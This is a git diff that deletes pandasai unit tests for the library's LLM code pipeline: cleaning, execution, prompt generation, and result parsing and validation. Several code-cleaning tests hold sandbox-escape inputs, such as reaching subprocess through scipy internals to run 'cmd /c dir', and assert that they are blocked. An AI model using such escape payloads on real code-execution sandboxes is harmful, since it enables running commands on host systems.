- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """df=execute_sql_query('SELECT COUNT(*) AS user_count FROM Users;')"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert isinstance(node, ast.Assign)
- assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_check_query_with_semicolon_execute_sql_func_no_assign(
- self, code_cleaning: CodeCleaning
- ):
- mock_node = ast.parse(
- """execute_sql_query('SELECT COUNT(*) AS user_count FROM Users;')"""
- ).body[0]
-
- class MockObject:
- table_name = "allowed_table"
-
- def __init__(self, table_name):
- self.name = table_name
-
- @property
- def cs_table_name(self):
- return f'"{self.name}"'
-
- code_cleaning._dfs = [MockObject("Users")]
-
- node = code_cleaning._validate_and_make_table_name_case_sensitive(mock_node)
-
- assert node.value.args[0].value == 'SELECT COUNT(*) AS user_count FROM "Users"'
-
- def test_clean_code_raise_private_variable_access_error(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import scipy
-result = {"type": "string", "value": f"{scipy.sparse._sputils.sys.modules['subprocess'].run(['cmd', '/c', 'dir'], text=True, capture_output=True).stdout}"}
-print(result)
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_import_with_restricted_modules(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-from datetime import sys
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_import_with_restricted_using_import_statement(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import datetime.sys as spy
-"""
- with pytest.raises(MaliciousQueryError):
- code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- def test_clean_code_raise_not_whitelisted_lib_with_none_security(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- builtins_code = """import scipy
-result = {'type': 'number', 'value': set([1, 2, 3])}"""
-
- context.config.security = "none"
- with pytest.raises(BadImportError):
- code_cleaning.execute(builtins_code, context=context, logger=logger)
-
- def test_clean_code_with_pltshow_in_code(
- self,
- code_cleaning: CodeCleaning,
- context: PipelineContext,
- logger: Logger,
- ):
- malicious_code = """
-import matplotlib.pyplot as plt
-print('test plt.show is removed')
-plt.show()
-"""
- code = code_cleaning.execute(malicious_code, context=context, logger=logger)
-
- assert code.output == """print('test plt.show is removed')"""
- assert isinstance(code, LogicUnitOutput)
- assert code.success is True
- assert code.message == "Code Cleaned Successfully"
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py b/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
deleted file mode 100644
index df7e8722a..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_execution.py
+++ /dev/null
@@ -1,326 +0,0 @@
-import os
-from typing import Optional
-from unittest.mock import MagicMock, Mock, patch
-
-import pandasai as pai
-import pytest
-
-from pandasai.agent import Agent
-from pandasai.exceptions import InvalidOutputValueMismatch, NoCodeFoundError
-from pandasai.helpers.logger import Logger
-from pandasai.helpers.optional import get_environment
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_execution import CodeExecution
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestCodeExecution:
- "Unit test for Code Execution"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pai.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def agent(self, llm, sample_df):
- return Agent([sample_df], config={"llm": llm, "enable_cache": False})
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def code(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- @pytest.fixture
- def code_execution(self):
- return CodeExecution()
-
- def test_init(self, context, config):
- # Test the initialization of the CodeExecution
- code_execution = CodeExecution()
- assert isinstance(code_execution, CodeExecution)
-
- def test_code_execution_successful_with_no_exceptions(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = code_execution.execute(
- input='result={"type":"string", "value":"5"}',
- context=context,
- logger=logger,
- )
-
- assert isinstance(code_execution, CodeExecution)
- assert result.output == {"type": "string", "value": "5"}
- assert result.message == "Code Executed Successfully"
- assert result.success is True
-
- def test_code_execution_unsuccessful_after_retries(self, context, logger):
- # Test Flow : Code Execution Successful after retry
- code_execution = CodeExecution()
-
- def mock_execute_code(*args, **kwargs):
- raise Exception("Unit test exception")
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(side_effect=mock_execute_code)
-
- def mock_intermediate_values(key: str):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- assert isinstance(code_execution, CodeExecution)
-
- result = None
- try:
- result = code_execution.execute(
- input="Test Code", context=context, logger=logger
- )
- except Exception:
- assert result is None
-
- @pytest.mark.skip(reason="Removed CodeManager class")
- def test_code_execution_successful_at_retry(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- code_execution = CodeExecution()
-
- def mock_execute_code(*args, **kwargs):
- if self.throw_exception is True:
- self.throw_exception = False
- raise Exception("Unit test exception")
- return "Mocked Result after retry"
-
- # Conditional return of execute_func method based arguments it is called with
- def mock_execute_func(*args, **kwargs):
- return mock_execute_code(*args, **kwargs)
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = mock_execute_func
- mock_code_manager.execute_code.name = "execute_code"
-
- code_execution._retry_run_code = Mock(
- return_value='result={"type":"string", "value":"5"}'
- )
-
- result = code_execution.execute(input="x=5", context=context, logger=logger)
-
- assert code_execution._retry_run_code.assert_called
- assert isinstance(code_execution, CodeExecution)
- assert result.output == {"type": "string", "value": "5"}
- assert result.message == "Code Executed Successfully"
- assert result.success is True
-
- def test_code_execution_output_type_mismatch(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- with pytest.raises(InvalidOutputValueMismatch):
- code_execution.execute(
- input='result={"type":"string", "value":5}',
- context=context,
- logger=logger,
- )
-
- def test_code_execution_output_is_not_dict(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- code_execution = CodeExecution()
-
- mock_code_manager = Mock()
- mock_code_manager.execute_code = Mock(return_value="Mocked Result")
-
- def mock_intermediate_values(key: str, default=None):
- if key == "last_prompt_id":
- return "Mocked Prompt ID"
- elif key == "code_manager":
- return mock_code_manager
- elif key == "additional_dependencies":
- return []
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- with pytest.raises(InvalidOutputValueMismatch):
- code_execution.execute(
- input="result=5",
- context=context,
- logger=logger,
- )
-
- @patch(
- "pandasai.pipelines.chat.code_execution.CodeExecution.execute_code",
- autospec=True,
- )
- def test_exception_handling(self, mock_execute_code: MagicMock, agent: Agent):
- os.environ["PANDASAI_API_URL"] = ""
- os.environ["PANDASAI_API_KEY"] = ""
-
- mock_execute_code.side_effect = NoCodeFoundError(
- "No code found in the response"
- )
- result = agent.chat("How many countries are in the dataframe?")
- assert result == (
- "Unfortunately, I was not able to answer your question, "
- "because of the following error:\n"
- "\nNo code found in the response\n"
- )
- assert agent.last_error == "No code found in the response"
-
- def test_get_environment(self):
- additional_dependencies = [
- {"name": "pyplot", "alias": "plt", "module": "matplotlib"},
- {"name": "numpy", "alias": "np", "module": "numpy"},
- ]
- environment = get_environment(additional_dependencies)
-
- assert "pd" in environment
- assert "plt" in environment
- assert "np" in environment
- assert environment["__builtins__"] == {
- "abs": abs,
- "all": all,
- "any": any,
- "ascii": ascii,
- "bin": bin,
- "bool": bool,
- "bytearray": bytearray,
- "bytes": bytes,
- "callable": callable,
- "chr": chr,
- "classmethod": classmethod,
- "complex": complex,
- "delattr": delattr,
- "dict": dict,
- "dir": dir,
- "divmod": divmod,
- "enumerate": enumerate,
- "filter": filter,
- "float": float,
- "format": format,
- "frozenset": frozenset,
- "getattr": getattr,
- "hasattr": hasattr,
- "hash": hash,
- "help": help,
- "hex": hex,
- "id": id,
- "int": int,
- "isinstance": isinstance,
- "issubclass": issubclass,
- "iter": iter,
- "len": len,
- "list": list,
- "locals": locals,
- "map": map,
- "max": max,
- "memoryview": memoryview,
- "min": min,
- "next": next,
- "object": object,
- "oct": oct,
- "ord": ord,
- "pow": pow,
- "print": print,
- "property": property,
- "range": range,
- "repr": repr,
- "reversed": reversed,
- "round": round,
- "set": set,
- "setattr": setattr,
- "slice": slice,
- "sorted": sorted,
- "staticmethod": staticmethod,
- "str": str,
- "sum": sum,
- "super": super,
- "tuple": tuple,
- "type": type,
- "vars": vars,
- "zip": zip,
- "__build_class__": __build_class__,
- "__name__": "__main__",
- }
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py b/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
deleted file mode 100644
index 3415f386d..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_code_generator.py
+++ /dev/null
@@ -1,112 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock, patch
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.code_generator import CodeGenerator
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.generate_python_code import GeneratePythonCodePrompt
-
-
-class TestCodeGenerator:
- "Unit test for Code Generator"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeGenerator
- code_generator = CodeGenerator()
- assert isinstance(code_generator, CodeGenerator)
-
- @patch("pandasai.llm.fake.FakeLLM.call")
- def test_code_not_found_in_cache(self, mock_call, context, logger):
- # Test Flow : Code Not found in the cache
- code_generator = CodeGenerator()
-
- mock_get_promt = Mock(return_value=GeneratePythonCodePrompt)
-
- def mock_intermediate_values(key: str):
- if key == "output_type":
- return ""
- elif key == "viz_lib_helper":
- return "matplotlib"
- elif key == "get_prompt":
- return mock_get_promt
-
- def mock_execute_func(function, *args, **kwargs):
- if function == mock_get_promt:
- return mock_get_promt()
- return "Mocked LLM Generated Code"
-
- context.get = Mock(side_effect=mock_intermediate_values)
- context._cache = Mock()
- context._cache.get = Mock(return_value=None)
-
- mock_call.return_value = "```python test_output```"
-
- result = code_generator.execute(
- input="test_input", context=context, logger=logger
- )
-
- assert isinstance(code_generator, CodeGenerator)
- assert result.output == "test_output"
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py b/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
deleted file mode 100644
index 3f253b4a7..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_error_prompt_generation.py
+++ /dev/null
@@ -1,111 +0,0 @@
-from typing import Optional
-from unittest.mock import MagicMock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import InvalidLLMOutputType
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.error_correction_pipeline.error_prompt_generation import (
- ErrorPromptGeneration,
-)
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.correct_error_prompt import CorrectErrorPrompt
-from pandasai.prompts.correct_output_type_error_prompt import (
- CorrectOutputTypeErrorPrompt,
-)
-
-
-class TestErrorPromptGeneration:
- "Unit test for Prompt Generation"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- def test_init(self):
- # Test the initialization of the PromptGeneration
- prompt_generation = ErrorPromptGeneration()
- assert isinstance(prompt_generation, ErrorPromptGeneration)
-
- def test_get_error_prompt_invalid_llm_output_type(self, context):
- error_prompt = ErrorPromptGeneration()
-
- # Mock the InvalidLLMOutputType exception
- mock_exception = MagicMock(spec=InvalidLLMOutputType)
-
- error_prompt.context = context
-
- # Call the method with the mock exception
- result = error_prompt.get_prompt(mock_exception, "code")
-
- # Call the method with the mock exception
- result = error_prompt.get_prompt(mock_exception, "code")
-
- # Assert that the CorrectOutputTypeErrorPrompt is returned
- assert isinstance(result, CorrectOutputTypeErrorPrompt)
-
- def test_get_error_prompt_other_exception(self, context):
- # Mock a generic exception
- mock_exception = MagicMock(spec=Exception)
-
- error_prompt = ErrorPromptGeneration()
-
- error_prompt.context = context
-
- # Call the method with the mock exception
- result = error_prompt.get_prompt(mock_exception, "code")
-
- # Assert that the CorrectErrorPrompt is returned
- assert isinstance(result, CorrectErrorPrompt)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py b/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
deleted file mode 100644
index ddc7222a3..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_prompt_generation.py
+++ /dev/null
@@ -1,127 +0,0 @@
-from typing import Optional
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.dataframe_serializer import DataframeSerializerType
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.prompt_generation import PromptGeneration
-from pandasai.pipelines.pipeline_context import PipelineContext
-from pandasai.prompts.generate_python_code import GeneratePythonCodePrompt
-from pandasai.prompts.generate_python_code_with_sql import (
- GeneratePythonCodeWithSQLPrompt,
-)
-
-
-class TestPromptGeneration:
- "Unit test for Prompt Generation"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def dataframe(self, sample_df):
- return DataFrame(sample_df)
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, dataframe, config):
- return PipelineContext([dataframe], config)
-
- def test_init(self):
- # Test the initialization of the PromptGeneration
- prompt_generation = PromptGeneration()
- assert isinstance(prompt_generation, PromptGeneration)
-
- def test_get_chat_prompt(self, context):
- # Test case 1: direct_sql is True
- prompt_generation = PromptGeneration()
- context.config.direct_sql = True
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodeWithSQLPrompt)
-
- # Test case 2: direct_sql is False
- context.config.direct_sql = False
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
-
- def test_get_chat_prompt_enforce_privacy(self, context):
- # Test case 1: direct_sql is True
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = True
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
- assert "samples" not in gen_prompt.to_string()
-
- def test_get_chat_prompt_enforce_privacy_false(self, context):
- # Test case 1: direct_sql is True
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = False
- context.config.dataframe_serializer = DataframeSerializerType.YML
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
- assert "samples" in gen_prompt.to_string()
-
- def test_get_chat_prompt_enforce_privacy_true_custom_head(self, context, sample_df):
- # Test case 1: direct_sql is True
- prompt_generation = PromptGeneration()
- context.config.enforce_privacy = True
- context.config.dataframe_serializer = DataframeSerializerType.CSV
-
- dataframe = DataFrame(sample_df)
- context.dfs = [dataframe]
-
- gen_prompt = prompt_generation.get_chat_prompt(context)
- assert isinstance(gen_prompt, GeneratePythonCodePrompt)
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py b/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
deleted file mode 100644
index cb0195422..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_result_parsing.py
+++ /dev/null
@@ -1,133 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.result_parsing import ResultParsing
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestResultParsing:
- "Unit test for Result Parsing"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeExecution
- result_parsing = ResultParsing()
- assert isinstance(result_parsing, ResultParsing)
-
- def test_result_parsing_successful_with_no_exceptions(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- result_parsing = ResultParsing()
- result_parsing._add_result_to_memory = Mock()
- mock_response_parser = Mock()
-
- def mock_intermediate_values(key: str):
- if key == "response_parser":
- return mock_response_parser
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = result_parsing.execute(
- input={"type": "string", "value": "Test Result"},
- context=context,
- logger=logger,
- )
-
- assert isinstance(result_parsing, ResultParsing)
- assert result.output == "Test Result"
- assert result.success is True
- assert result.message == "Results parsed successfully"
- assert result.metadata is None
-
- def test_result_parsing_unsuccessful_with_exceptions(self, context, logger):
- # Test Flow : Code Execution Unsuccessful with exceptions
- result_parsing = ResultParsing()
- result_parsing._add_result_to_memory = Mock()
- mock_response_parser = Mock()
-
- def mock_result_parsing(*args, **kwargs):
- raise Exception("Unit test exception")
-
- def mock_intermediate_values(key: str):
- if key == "response_parser":
- return mock_response_parser
-
- context.get = Mock(side_effect=mock_intermediate_values)
-
- result = None
- try:
- result = result_parsing.execute(
- input="Test Result", context=context, logger=logger
- )
- except Exception:
- assert result is None
- assert isinstance(result_parsing, ResultParsing)
-
- def test_add_number_result_to_memory(self, context):
- result_parsing = ResultParsing()
- result_parsing.execute(input={"type": "number", "value": 42}, context=context)
- assert context.memory.last()["message"] == "42"
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py b/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
deleted file mode 100644
index 396cad90d..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_result_validation.py
+++ /dev/null
@@ -1,135 +0,0 @@
-from typing import Optional
-from unittest.mock import Mock
-
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.result_validation import ResultValidation
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestResultValidation:
- "Unit test for Result Validation"
-
- throw_exception = True
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeExecution
- result_validation = ResultValidation()
- assert isinstance(result_validation, ResultValidation)
-
- def test_result_is_none(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- result_validation = ResultValidation()
-
- result = result_validation.execute(input=None, context=context, logger=logger)
-
- print(result)
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output is None
-
- def test_result_is_not_of_dict_type(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- result_validation = ResultValidation()
-
- result = result_validation.execute(
- input="Not Dict Type Result", context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == "Not Dict Type Result"
- assert result.success is False
- assert result.message is None
-
- def test_result_is_of_dict_type_and_valid(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- context.get = Mock(return_value="")
-
- result_validation = ResultValidation()
- result = result_validation.execute(
- input={"Mocked": "Result"}, context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == {"Mocked": "Result"}
- assert result.success is True
- assert result.message == "Output Validation Successful"
-
- def test_result_is_of_dict_type_and_not_valid(self, context, logger):
- # Test Flow : Code Execution Successful with no exceptions
- result_validation = ResultValidation()
- output_type = Mock()
-
- context.get = Mock(return_value=output_type)
- output_type.validate = Mock(return_value=(False, "Mocked Logs"))
-
- result = result_validation.execute(
- input={"Mocked": "Result"}, context=context, logger=logger
- )
-
- assert isinstance(result_validation, ResultValidation)
- assert result.output == {"Mocked": "Result"}
- assert result.success is False
- assert result.message == "Output Validation Failed"
diff --git a/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py b/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
deleted file mode 100644
index 426e7629a..000000000
--- a/tests/unit_tests/pipelines/smart_datalake/test_validate_pipeline_input.py
+++ /dev/null
@@ -1,239 +0,0 @@
-from typing import Optional
-
-import pandas as pd
-import pytest
-
-from pandasai.dataframe.base import DataFrame
-from pandasai.exceptions import InvalidConfigError
-from pandasai.helpers.logger import Logger
-from pandasai.llm.fake import FakeLLM
-from pandasai.pipelines.chat.validate_pipeline_input import (
- ValidatePipelineInput,
-)
-from pandasai.pipelines.logic_unit_output import LogicUnitOutput
-from pandasai.pipelines.pipeline_context import PipelineContext
-
-
-class TestValidatePipelineInput:
- "Unit test for Validate Pipeline Input"
-
- @pytest.fixture
- def llm(self, output: Optional[str] = None):
- return FakeLLM(output=output)
-
- @pytest.fixture
- def sample_df(self):
- return pd.DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def sql_connector(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def pgsql_connector(self):
- return DataFrame(
- {
- "country": [
- "United States",
- "United Kingdom",
- "France",
- "Germany",
- "Italy",
- "Spain",
- "Canada",
- "Australia",
- "Japan",
- "China",
- ],
- "gdp": [
- 19294482071552,
- 2891615567872,
- 2411255037952,
- 3435817336832,
- 1745433788416,
- 1181205135360,
- 1607402389504,
- 1490967855104,
- 4380756541440,
- 14631844184064,
- ],
- "happiness_index": [
- 6.94,
- 7.16,
- 6.66,
- 7.07,
- 6.38,
- 6.4,
- 7.23,
- 7.22,
- 5.87,
- 5.12,
- ],
- }
- )
-
- @pytest.fixture
- def config(self, llm):
- return {"llm": llm, "enable_cache": True}
-
- @pytest.fixture
- def context(self, sample_df, config):
- return PipelineContext([sample_df], config)
-
- @pytest.fixture
- def logger(self):
- return Logger(True, False)
-
- def test_init(self, context, config):
- # Test the initialization of the CodeGenerator
- code_generator = ValidatePipelineInput()
- assert isinstance(code_generator, ValidatePipelineInput)
-
- def test_validate_input_with_direct_sql_false_and_non_connector(
- self, context, logger
- ):
- input_validator = ValidatePipelineInput()
-
- result = input_validator.execute(input="test", context=context, logger=logger)
-
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_non_connector(
- self, sample_df, llm, logger
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": True}
-
- context = PipelineContext([sample_df], config)
- with pytest.raises(InvalidConfigError):
- input_validator.execute(input="test", context=context, logger=logger)
-
- def test_validate_input_with_direct_sql_false_and_connector(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
- config = {"llm": llm, "enable_cache": True, "direct_sql": False}
-
- context = PipelineContext([sample_df, sql_connector], config)
- result = input_validator.execute(input="test", context=context, logger=logger)
- assert isinstance(result, LogicUnitOutput)
- assert result.output == "test"
-
- def test_validate_input_with_direct_sql_true_and_connector(
- self, sample_df, llm, logger, sql_connector
- ):
- input_validator = ValidatePipelineInput()
-
- # context for true config
